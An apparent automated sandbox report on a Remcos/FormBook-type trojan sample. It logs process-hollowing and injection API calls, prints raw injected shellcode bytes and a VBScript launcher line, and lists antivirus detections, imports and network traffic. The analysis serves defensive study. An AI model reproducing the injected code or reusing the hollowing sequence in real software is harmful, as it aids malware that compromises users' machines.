command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe" 2 3400 16935453
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000011c
inherit_handles: 0
success 1 0
1619628936.385375
CreateProcessInternalW
thread_identifier: 3336
thread_handle: 0x00000080
process_identifier: 3332
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
track: 1
command_line: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000084
inherit_handles: 1
success 1 0
1619628948.60475
CreateProcessInternalW
thread_identifier: 3720
thread_handle: 0x00000108
process_identifier: 3716
current_directory:
filepath: C:\Windows\System32\notepad.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\notepad.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628948.60475
NtAllocateVirtualMemory
process_identifier: 3716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619628948.60475
NtAllocateVirtualMemory
process_identifier: 3716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000c0000
success 0 0
1619628948.60475
WriteProcessMemory
process_identifier: 3716
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628948.60475
WriteProcessMemory
process_identifier: 3716
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628947.416625
NtResumeThread
thread_handle: 0x000001e0
suspend_count: 1
process_identifier: 3400
success 0 0
1619628947.447625
CreateProcessInternalW
thread_identifier: 3560
thread_handle: 0x00000214
process_identifier: 3556
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\wscript.exe
track: 1
command_line: "C:\Windows\System32\WScript.exe" "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs"
filepath_r: C:\Windows\System32\WScript.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x0000020c
inherit_handles: 0
success 1 0
1619628948.21325
CreateProcessInternalW
thread_identifier: 3648
thread_handle: 0x0000011c
process_identifier: 3644
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000120
inherit_handles: 0
success 1 0
1619628948.88525
CreateProcessInternalW
thread_identifier: 3796
thread_handle: 0x00000280
process_identifier: 3792
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x000002e4
inherit_handles: 0
success 1 0
1619628960.4325
CreateProcessInternalW
thread_identifier: 4072
thread_handle: 0x00000108
process_identifier: 4068
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628960.4325
NtUnmapViewOfSection
process_identifier: 4068
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619628960.4325
NtMapViewOfSection
section_handle: 0x00000110
process_identifier: 4068
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619628960.4325
NtGetContextThread
thread_handle: 0x00000108
success 0 0
1619628960.4325
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4068
success 0 0
1619628960.4635
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4068
success 0 0
1619628960.4635
CreateProcessInternalW
thread_identifier: 3128
thread_handle: 0x0000010c
process_identifier: 3124
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe" 2 4068 16948734
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000011c
inherit_handles: 0
success 1 0
1619628949.04125
CreateProcessInternalW
thread_identifier: 3908
thread_handle: 0x000000cc
process_identifier: 3904
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000000d0
inherit_handles: 0
success 1 0
1619628949.072
CreateProcessInternalW
thread_identifier: 3948
thread_handle: 0x00000080
process_identifier: 3944
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
track: 1
command_line: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000084
inherit_handles: 1
success 1 0
1619628961.275625
CreateProcessInternalW
thread_identifier: 1832
thread_handle: 0x00000108
process_identifier: 3384
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628961.275625
NtUnmapViewOfSection
process_identifier: 3384
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619628961.275625
NtMapViewOfSection
section_handle: 0x00000110
process_identifier: 3384
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619628961.275625
NtGetContextThread
thread_handle: 0x00000108
success 0 0
1619628961.275625
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3384
success 0 0
1619628961.369625
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3384
success 0 0
1619628961.400625
CreateProcessInternalW
thread_identifier: 3512
thread_handle: 0x0000010c
process_identifier: 3168
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe" 2 3384 16949640
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000011c
inherit_handles: 0
success 1 0
File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 个事件)
Cynet Malicious (score: 100)
FireEye Generic.mg.632e3d1eedfc8164
CAT-QuickHeal Trojan.CKGENERIC
McAfee RDN/Generic.grp
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
K7AntiVirus Trojan ( 005678511 )
Alibaba Trojan:Win32/FormBook.36aa18e4
K7GW Trojan ( 005678511 )
CrowdStrike win/malicious_confidence_80% (W)
Arcabit Trojan.Generic.D2057947
Invincea heuristic
BitDefenderTheta Gen:NN.ZelphiF.34128.QGW@aKk@V8ni
Cyren W32/Injector.FYAR-0144
Symantec Trojan.Gen.2
APEX Malicious
Avast Win32:Malware-gen
ClamAV Win.Trojan.LokiBot-7908075-0
Kaspersky HEUR:Trojan.Win32.Kryptik.gen
BitDefender Trojan.GenericKD.33913159
NANO-Antivirus Trojan.Win32.Stealer.hkqqhs
Paloalto generic.ml
MicroWorld-eScan Trojan.GenericKD.33913159
Tencent Win32.Trojan.Kryptik.Wlpm
Endgame malicious (high confidence)
Sophos Mal/Fareit-AA
DrWeb Trojan.PWS.Stealer.18836
Zillya Trojan.Injector.Win32.739536
TrendMicro TROJ_GEN.R014C0WES20
Trapmine malicious.moderate.ml.score
Emsisoft Trojan.GenericKD.33913159 (B)
SentinelOne DFI - Suspicious PE
MAX malware (ai score=84)
Antiy-AVL Trojan/Win32.Kryptik
Microsoft Trojan:Win32/FormBook.CM!MTB
AegisLab Trojan.Win32.Malicious.4!c
ZoneAlarm HEUR:Trojan.Win32.Kryptik.gen
GData Trojan.GenericKD.33913159
AhnLab-V3 Suspicious/Win.Delphiless.X2066
Acronis suspicious
VBA32 TScope.Trojan.Delf
ALYac Trojan.GenericKD.33913159
Ad-Aware Trojan.GenericKD.33913159
Malwarebytes Trojan.MalPack.DLF
ESET-NOD32 a variant of Win32/Injector.EMHC
TrendMicro-HouseCall TROJ_GEN.R014C0WES20
Rising Backdoor.Remcos!8.B89E (CLOUD)
Yandex Trojan.AvsArher.bTOmTw
Ikarus Trojan.Inject
MaxSecure Trojan.Malware.73736783.susgen
The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 个事件)
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\cmd.exe
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x476150 VirtualFree
0x476154 VirtualAlloc
0x476158 LocalFree
0x47615c LocalAlloc
0x476160 GetVersion
0x476164 GetCurrentThreadId
0x476170 VirtualQuery
0x476174 WideCharToMultiByte
0x476178 MultiByteToWideChar
0x47617c lstrlenA
0x476180 lstrcpynA
0x476184 LoadLibraryExA
0x476188 GetThreadLocale
0x47618c GetStartupInfoA
0x476190 GetProcAddress
0x476194 GetModuleHandleA
0x476198 GetModuleFileNameA
0x47619c GetLocaleInfoA
0x4761a0 GetCommandLineA
0x4761a4 FreeLibrary
0x4761a8 FindFirstFileA
0x4761ac FindClose
0x4761b0 ExitProcess
0x4761b4 WriteFile
0x4761bc RtlUnwind
0x4761c0 RaiseException
0x4761c4 GetStdHandle
Library user32.dll:
0x4761cc GetKeyboardType
0x4761d0 LoadStringA
0x4761d4 MessageBoxA
0x4761d8 CharNextA
Library advapi32.dll:
0x4761e0 RegQueryValueExA
0x4761e4 RegOpenKeyExA
0x4761e8 RegCloseKey
Library oleaut32.dll:
0x4761f0 SysFreeString
0x4761f4 SysReAllocStringLen
0x4761f8 SysAllocStringLen
Library kernel32.dll:
0x476200 TlsSetValue
0x476204 TlsGetValue
0x476208 LocalAlloc
0x47620c GetModuleHandleA
Library advapi32.dll:
0x476214 RegQueryValueExA
0x476218 RegOpenKeyExA
0x47621c RegCloseKey
Library kernel32.dll:
0x476224 lstrcpyA
0x476228 WriteFile
0x476230 WaitForSingleObject
0x476234 VirtualQuery
0x476238 VirtualAlloc
0x47623c Sleep
0x476240 SizeofResource
0x476244 SetThreadLocale
0x476248 SetFilePointer
0x47624c SetEvent
0x476250 SetErrorMode
0x476254 SetEndOfFile
0x476258 ResetEvent
0x47625c ReadFile
0x476260 MulDiv
0x476264 LockResource
0x476268 LoadResource
0x47626c LoadLibraryA
0x476278 GlobalUnlock
0x47627c GlobalReAlloc
0x476280 GlobalHandle
0x476284 GlobalLock
0x476288 GlobalFree
0x47628c GlobalFindAtomA
0x476290 GlobalDeleteAtom
0x476294 GlobalAlloc
0x476298 GlobalAddAtomA
0x47629c GetVersionExA
0x4762a0 GetVersion
0x4762a4 GetTickCount
0x4762a8 GetThreadLocale
0x4762b0 GetSystemTime
0x4762b4 GetSystemInfo
0x4762b8 GetStringTypeExA
0x4762bc GetStdHandle
0x4762c0 GetProcAddress
0x4762c4 GetModuleHandleA
0x4762c8 GetModuleFileNameA
0x4762cc GetLocaleInfoA
0x4762d0 GetLocalTime
0x4762d4 GetLastError
0x4762d8 GetFullPathNameA
0x4762dc GetFileAttributesA
0x4762e0 GetDiskFreeSpaceA
0x4762e4 GetDateFormatA
0x4762e8 GetCurrentThreadId
0x4762ec GetCurrentProcessId
0x4762f0 GetCPInfo
0x4762f4 GetACP
0x4762f8 FreeResource
0x4762fc InterlockedExchange
0x476300 FreeLibrary
0x476304 FormatMessageA
0x476308 FindResourceA
0x47630c FindFirstFileA
0x476310 FindClose
0x47631c ExitThread
0x476320 EnumCalendarInfoA
0x47632c CreateThread
0x476330 CreateFileA
0x476334 CreateEventA
0x476338 CompareStringA
0x47633c CloseHandle
Library version.dll:
0x476344 VerQueryValueA
0x47634c GetFileVersionInfoA
Library gdi32.dll:
0x476354 UnrealizeObject
0x476358 StretchBlt
0x47635c SetWindowOrgEx
0x476360 SetWindowExtEx
0x476364 SetWinMetaFileBits
0x476368 SetViewportOrgEx
0x47636c SetViewportExtEx
0x476370 SetTextColor
0x476374 SetStretchBltMode
0x476378 SetROP2
0x47637c SetPixel
0x476380 SetMapMode
0x476384 SetEnhMetaFileBits
0x476388 SetDIBColorTable
0x47638c SetBrushOrgEx
0x476390 SetBkMode
0x476394 SetBkColor
0x476398 SelectPalette
0x47639c SelectObject
0x4763a0 SaveDC
0x4763a4 RestoreDC
0x4763a8 Rectangle
0x4763ac RectVisible
0x4763b0 RealizePalette
0x4763b4 Polyline
0x4763b8 PolyPolyline
0x4763bc PlayEnhMetaFile
0x4763c0 PatBlt
0x4763c4 MoveToEx
0x4763c8 MaskBlt
0x4763cc LineTo
0x4763d0 IntersectClipRect
0x4763d4 GetWindowOrgEx
0x4763d8 GetWinMetaFileBits
0x4763dc GetTextMetricsA
0x4763e8 GetStockObject
0x4763ec GetPixel
0x4763f0 GetPaletteEntries
0x4763f4 GetObjectA
0x476400 GetEnhMetaFileBits
0x476404 GetDeviceCaps
0x476408 GetDIBits
0x47640c GetDIBColorTable
0x476410 GetDCOrgEx
0x476418 GetClipBox
0x47641c GetBrushOrgEx
0x476420 GetBitmapBits
0x476424 ExtCreatePen
0x476428 ExcludeClipRect
0x47642c DeleteObject
0x476430 DeleteEnhMetaFile
0x476434 DeleteDC
0x476438 CreateSolidBrush
0x47643c CreatePenIndirect
0x476440 CreatePen
0x476444 CreatePalette
0x47644c CreateFontIndirectA
0x476450 CreateDIBitmap
0x476454 CreateDIBSection
0x476458 CreateCompatibleDC
0x476460 CreateBrushIndirect
0x476464 CreateBitmap
0x476468 CopyEnhMetaFileA
0x47646c BitBlt
Library user32.dll:
0x476474 CreateWindowExA
0x476478 WindowFromPoint
0x47647c WinHelpA
0x476480 WaitMessage
0x476484 ValidateRect
0x476488 UpdateWindow
0x47648c UnregisterClassA
0x476490 UnionRect
0x476494 UnhookWindowsHookEx
0x476498 TranslateMessage
0x4764a0 TrackPopupMenu
0x4764a8 ShowWindow
0x4764ac ShowScrollBar
0x4764b0 ShowOwnedPopups
0x4764b4 ShowCursor
0x4764b8 SetWindowsHookExA
0x4764bc SetWindowTextA
0x4764c0 SetWindowPos
0x4764c4 SetWindowPlacement
0x4764c8 SetWindowLongA
0x4764cc SetTimer
0x4764d0 SetScrollRange
0x4764d4 SetScrollPos
0x4764d8 SetScrollInfo
0x4764dc SetRect
0x4764e0 SetPropA
0x4764e4 SetParent
0x4764e8 SetMenuItemInfoA
0x4764ec SetMenu
0x4764f0 SetKeyboardState
0x4764f4 SetForegroundWindow
0x4764f8 SetFocus
0x4764fc SetCursor
0x476500 SetClipboardData
0x476504 SetClassLongA
0x476508 SetCapture
0x47650c SetActiveWindow
0x476510 SendMessageA
0x476514 ScrollWindowEx
0x476518 ScrollWindow
0x47651c ScreenToClient
0x476520 RemovePropA
0x476524 RemoveMenu
0x476528 ReleaseDC
0x47652c ReleaseCapture
0x476538 RegisterClassA
0x47653c RedrawWindow
0x476540 PtInRect
0x476544 PostQuitMessage
0x476548 PostMessageA
0x47654c PeekMessageA
0x476550 OpenClipboard
0x476554 OffsetRect
0x476558 OemToCharA
0x47655c MessageBoxA
0x476560 MessageBeep
0x476564 MapWindowPoints
0x476568 MapVirtualKeyA
0x47656c LoadStringA
0x476570 LoadKeyboardLayoutA
0x476574 LoadIconA
0x476578 LoadCursorA
0x47657c LoadBitmapA
0x476580 KillTimer
0x476584 IsZoomed
0x476588 IsWindowVisible
0x47658c IsWindowEnabled
0x476590 IsWindow
0x476594 IsRectEmpty
0x476598 IsIconic
0x47659c IsDialogMessageA
0x4765a0 IsChild
0x4765a4 IsCharAlphaNumericA
0x4765a8 IsCharAlphaA
0x4765ac InvalidateRect
0x4765b0 IntersectRect
0x4765b4 InsertMenuItemA
0x4765b8 InsertMenuA
0x4765bc InflateRect
0x4765c4 GetWindowTextA
0x4765c8 GetWindowRect
0x4765cc GetWindowPlacement
0x4765d0 GetWindowLongA
0x4765d4 GetWindowDC
0x4765d8 GetTopWindow
0x4765dc GetSystemMetrics
0x4765e0 GetSystemMenu
0x4765e4 GetSysColorBrush
0x4765e8 GetSysColor
0x4765ec GetSubMenu
0x4765f0 GetScrollRange
0x4765f4 GetScrollPos
0x4765f8 GetScrollInfo
0x4765fc GetPropA
0x476600 GetParent
0x476604 GetWindow
0x476608 GetMessageTime
0x47660c GetMenuStringA
0x476610 GetMenuState
0x476614 GetMenuItemInfoA
0x476618 GetMenuItemID
0x47661c GetMenuItemCount
0x476620 GetMenu
0x476624 GetLastActivePopup
0x476628 GetKeyboardState
0x476630 GetKeyboardLayout
0x476634 GetKeyState
0x476638 GetKeyNameTextA
0x47663c GetIconInfo
0x476640 GetForegroundWindow
0x476644 GetFocus
0x476648 GetDoubleClickTime
0x47664c GetDlgItem
0x476650 GetDesktopWindow
0x476654 GetDCEx
0x476658 GetDC
0x47665c GetCursorPos
0x476660 GetCursor
0x476664 GetClipboardData
0x476668 GetClientRect
0x47666c GetClassNameA
0x476670 GetClassInfoA
0x476674 GetCaretPos
0x476678 GetCapture
0x47667c GetActiveWindow
0x476680 FrameRect
0x476684 FindWindowA
0x476688 FillRect
0x47668c EqualRect
0x476690 EnumWindows
0x476694 EnumThreadWindows
0x47669c EndPaint
0x4766a0 EnableWindow
0x4766a4 EnableScrollBar
0x4766a8 EnableMenuItem
0x4766ac EmptyClipboard
0x4766b0 DrawTextA
0x4766b4 DrawMenuBar
0x4766b8 DrawIconEx
0x4766bc DrawIcon
0x4766c0 DrawFrameControl
0x4766c4 DrawFocusRect
0x4766c8 DrawEdge
0x4766cc DispatchMessageA
0x4766d0 DestroyWindow
0x4766d4 DestroyMenu
0x4766d8 DestroyIcon
0x4766dc DestroyCursor
0x4766e0 DeleteMenu
0x4766e4 DefWindowProcA
0x4766e8 DefMDIChildProcA
0x4766ec DefFrameProcA
0x4766f0 CreatePopupMenu
0x4766f4 CreateMenu
0x4766f8 CreateIcon
0x4766fc CloseClipboard
0x476700 ClientToScreen
0x476704 CheckMenuItem
0x476708 CallWindowProcA
0x47670c CallNextHookEx
0x476710 BeginPaint
0x476714 CharNextA
0x476718 CharLowerBuffA
0x47671c CharLowerA
0x476720 CharUpperBuffA
0x476724 CharToOemA
0x476728 AdjustWindowRectEx
Library kernel32.dll:
0x476734 Sleep
Library oleaut32.dll:
0x47673c SafeArrayPtrOfIndex
0x476740 SafeArrayGetUBound
0x476744 SafeArrayGetLBound
0x476748 SafeArrayCreate
0x47674c VariantChangeType
0x476750 VariantCopy
0x476754 VariantClear
0x476758 VariantInit
Library comctl32.dll:
0x476768 ImageList_Write
0x47676c ImageList_Read
0x47677c ImageList_DragMove
0x476780 ImageList_DragLeave
0x476784 ImageList_DragEnter
0x476788 ImageList_EndDrag
0x47678c ImageList_BeginDrag
0x476790 ImageList_Remove
0x476794 ImageList_DrawEx
0x476798 ImageList_Replace
0x47679c ImageList_Draw
0x4767ac ImageList_Add
0x4767b4 ImageList_Destroy
0x4767b8 ImageList_Create
0x4767bc InitCommonControls
Library comdlg32.dll:
0x4767c4 GetOpenFileNameA
Library kernel32.dll:
0x4767cc MulDiv

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57756 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 62912 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.